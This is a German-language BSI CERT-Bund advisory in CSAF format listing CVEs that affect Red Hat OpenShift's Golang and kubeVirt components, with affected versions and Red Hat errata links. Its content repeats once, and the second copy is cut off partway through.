2024-08-28 22:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.
Betroffene Betriebssysteme
- Linux
{ document: { aggregate_severity: { text: "mittel", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", title: "Angriff", }, { category: "general", text: "- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2023-0204 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-0204.json", }, { category: "self", summary: "WID-SEC-2023-0204 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0204", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0408 vom 2023-01-25", url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0566 vom 2023-02-07", url: "https://access.redhat.com/errata/RHSA-2023:0566", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0652 vom 2023-02-15", url: "https://access.redhat.com/errata/RHSA-2023:0652", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0769 vom 2023-02-21", url: "https://access.redhat.com/errata/RHSA-2023:0769", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0774 vom 2023-02-22", url: "https://access.redhat.com/errata/RHSA-2023:0774", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0890 vom 2023-02-28", url: "https://access.redhat.com/errata/RHSA-2023:0890", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0895 vom 2023-02-28", url: "https://access.redhat.com/errata/RHSA-2023:0895", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1042 vom 2023-03-07", url: "https://access.redhat.com/errata/RHSA-2023:1042", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1529 vom 2023-03-30", url: "https://access.redhat.com/errata/RHSA-2023:1529", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2367 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2367", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2357 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2357", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2283 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2283", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2282 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2282", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2253 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2253", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1328 vom 2023-05-18", url: "https://access.redhat.com/errata/RHSA-2023:1328", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1326 vom 2023-05-18", url: "https://access.redhat.com/errata/RHSA-2023:1326", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3542 vom 2023-06-14", url: "https://access.redhat.com/errata/RHSA-2023:3542", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3642 vom 2023-06-15", url: "https://access.redhat.com/errata/RHSA-2023:3642", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3664 vom 2023-06-19", url: "https://access.redhat.com/errata/RHSA-2023:3664", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3914 vom 2023-07-06", url: "https://access.redhat.com/errata/RHSA-2023:3914", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3915 vom 2023-07-06", url: "https://access.redhat.com/errata/RHSA-2023:3915", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:4488 vom 2023-08-07", url: "https://access.redhat.com/errata/RHSA-2023:4488", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:5754 vom 2024-08-29", url: "https://access.redhat.com/errata/RHSA-2024:5754", }, ], source_lang: "en-US", title: "Red Hat OpenShift: Mehrere Schwachstellen", tracking: { current_release_date: "2024-08-28T22:00:00.000+00:00", generator: { date: "2024-08-29T08:11:19.180+00:00", engine: { name: "BSI-WID", version: "1.3.6", }, }, id: "WID-SEC-W-2023-0204", initial_release_date: "2023-01-25T23:00:00.000+00:00", revision_history: [ { date: "2023-01-25T23:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2023-02-06T23:00:00.000+00:00", number: "2", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-14T23:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-20T23:00:00.000+00:00", number: "4", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-21T23:00:00.000+00:00", number: "5", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-28T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-03-06T23:00:00.000+00:00", number: "7", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-03-29T22:00:00.000+00:00", number: "8", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-05-09T22:00:00.000+00:00", number: "9", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-05-18T22:00:00.000+00:00", number: "10", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-14T22:00:00.000+00:00", number: "11", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-15T22:00:00.000+00:00", number: "12", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-19T22:00:00.000+00:00", number: "13", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-07-05T22:00:00.000+00:00", number: "14", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-08-06T22:00:00.000+00:00", number: "15", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-08-28T22:00:00.000+00:00", number: "16", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "16", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { branches: [ { category: "product_version_range", name: "Container Platform <4.12.1", product: { name: "Red Hat OpenShift Container Platform <4.12.1", product_id: "T025202", }, }, { category: "product_version", name: "Container Platform 4.12.1", product: { name: "Red Hat OpenShift Container Platform 4.12.1", product_id: "T025202-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform", }, }, }, { category: "product_version", name: "Container Platform 4.11", product: { name: "Red Hat OpenShift Container Platform 4.11", product_id: "T025990", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.11", }, }, }, { category: "product_version_range", name: "<4.12.0", product: { name: "Red Hat OpenShift <4.12.0", product_id: "T026026", }, }, { category: "product_version", name: "4.12.0", product: { name: "Red Hat OpenShift 4.12.0", product_id: "T026026-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:4.12.0", }, }, }, { category: "product_version", name: "Container Platform 4.12", product: { name: "Red Hat OpenShift Container Platform 4.12", product_id: "T026435", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.12", }, }, }, { category: "product_version", name: "Container Platform 4.13", product: { name: "Red Hat OpenShift Container Platform 4.13", product_id: "T027760", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.13", }, }, }, { category: "product_version_range", name: "Container Platform <4.11.43", product: { name: "Red Hat OpenShift Container Platform <4.11.43", product_id: "T028132", }, }, { category: "product_version", name: "Container Platform 4.11.43", product: { name: "Red Hat OpenShift Container Platform 4.11.43", product_id: "T028132-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.11.43", }, }, }, { category: "product_version", name: "Developer Tools and Services 4.11", product: { name: "Red Hat OpenShift Developer Tools and Services 4.11", product_id: "T028205", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:developer_tools_and_services_4.11", }, }, }, { category: "product_version_range", name: "Container Platform <4.11.44", product: { name: "Red Hat OpenShift Container Platform <4.11.44", product_id: "T028416", }, }, { category: "product_version", name: "Container Platform 4.11.44", product: { name: "Red Hat OpenShift Container Platform 4.11.44", product_id: "T028416-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.11.44", }, }, }, { category: "product_version_range", name: "Container Platform <4.15.29", product: { name: "Red Hat OpenShift Container Platform <4.15.29", product_id: "T037140", }, }, { category: "product_version", name: "Container Platform 4.15.29", product: { name: "Red Hat OpenShift Container Platform 4.15.29", product_id: "T037140-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.15.29", }, }, }, ], category: "product_name", name: "OpenShift", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-38561", }, { cve: "CVE-2021-44716", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-44716", }, { cve: "CVE-2021-44717", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-44717", }, { cve: "CVE-2022-1705", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1705", }, { cve: "CVE-2022-1798", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1798", }, { cve: "CVE-2022-1962", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1962", }, { cve: "CVE-2022-23772", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23772", }, { cve: "CVE-2022-23773", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23773", }, { cve: "CVE-2022-23806", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23806", }, { cve: "CVE-2022-28131", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-28131", }, { cve: "CVE-2022-29526", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-29526", }, { cve: "CVE-2022-30629", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30629", }, { cve: "CVE-2022-30630", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30630", }, { cve: "CVE-2022-30631", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30631", }, { cve: "CVE-2022-30632", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30632", }, { cve: "CVE-2022-30633", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30633", }, { cve: "CVE-2022-30635", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30635", }, { cve: "CVE-2022-32148", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-32148", }, ], }
WID-SEC-W-2023-0204
Vulnerability from csaf_certbund
Published
2023-01-25 23:00
Modified
2024-08-28 22:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.
Betroffene Betriebssysteme
- Linux
{ document: { aggregate_severity: { text: "mittel", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", title: "Angriff", }, { category: "general", text: "- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2023-0204 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-0204.json", }, { category: "self", summary: "WID-SEC-2023-0204 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0204", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0408 vom 2023-01-25", url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0566 vom 2023-02-07", url: "https://access.redhat.com/errata/RHSA-2023:0566", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0652 vom 2023-02-15", url: "https://access.redhat.com/errata/RHSA-2023:0652", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0769 vom 2023-02-21", url: "https://access.redhat.com/errata/RHSA-2023:0769", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0774 vom 2023-02-22", url: "https://access.redhat.com/errata/RHSA-2023:0774", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0890 vom 2023-02-28", url: "https://access.redhat.com/errata/RHSA-2023:0890", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0895 vom 2023-02-28", url: "https://access.redhat.com/errata/RHSA-2023:0895", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1042 vom 2023-03-07", url: "https://access.redhat.com/errata/RHSA-2023:1042", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1529 vom 2023-03-30", url: "https://access.redhat.com/errata/RHSA-2023:1529", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2367 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2367", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2357 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2357", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2283 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2283", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2282 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2282", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:2253 vom 2023-05-09", url: "https://access.redhat.com/errata/RHSA-2023:2253", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1328 vom 2023-05-18", url: "https://access.redhat.com/errata/RHSA-2023:1328", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:1326 vom 2023-05-18", url: "https://access.redhat.com/errata/RHSA-2023:1326", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3542 vom 2023-06-14", url: "https://access.redhat.com/errata/RHSA-2023:3542", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3642 vom 2023-06-15", url: "https://access.redhat.com/errata/RHSA-2023:3642", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3664 vom 2023-06-19", url: "https://access.redhat.com/errata/RHSA-2023:3664", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3914 vom 2023-07-06", url: "https://access.redhat.com/errata/RHSA-2023:3914", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3915 vom 2023-07-06", url: "https://access.redhat.com/errata/RHSA-2023:3915", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:4488 vom 2023-08-07", url: "https://access.redhat.com/errata/RHSA-2023:4488", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:5754 vom 2024-08-29", url: "https://access.redhat.com/errata/RHSA-2024:5754", }, ], source_lang: "en-US", title: "Red Hat OpenShift: Mehrere Schwachstellen", tracking: { current_release_date: "2024-08-28T22:00:00.000+00:00", generator: { date: "2024-08-29T08:11:19.180+00:00", engine: { name: "BSI-WID", version: "1.3.6", }, }, id: "WID-SEC-W-2023-0204", initial_release_date: "2023-01-25T23:00:00.000+00:00", revision_history: [ { date: "2023-01-25T23:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2023-02-06T23:00:00.000+00:00", number: "2", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-14T23:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-20T23:00:00.000+00:00", number: "4", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-21T23:00:00.000+00:00", number: "5", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-28T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-03-06T23:00:00.000+00:00", number: "7", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-03-29T22:00:00.000+00:00", number: "8", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-05-09T22:00:00.000+00:00", number: "9", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-05-18T22:00:00.000+00:00", number: "10", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-14T22:00:00.000+00:00", number: "11", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-15T22:00:00.000+00:00", number: "12", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-19T22:00:00.000+00:00", number: "13", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-07-05T22:00:00.000+00:00", number: "14", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-08-06T22:00:00.000+00:00", number: "15", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-08-28T22:00:00.000+00:00", number: "16", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "16", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { branches: [ { category: "product_version_range", name: "Container Platform <4.12.1", product: { name: "Red Hat OpenShift Container Platform <4.12.1", product_id: "T025202", }, }, { category: "product_version", name: "Container Platform 4.12.1", product: { name: "Red Hat OpenShift Container Platform 4.12.1", product_id: "T025202-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform", }, }, }, { category: "product_version", name: "Container Platform 4.11", product: { name: "Red Hat OpenShift Container Platform 4.11", product_id: "T025990", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.11", }, }, }, { category: "product_version_range", name: "<4.12.0", product: { name: "Red Hat OpenShift <4.12.0", product_id: "T026026", }, }, { category: "product_version", name: 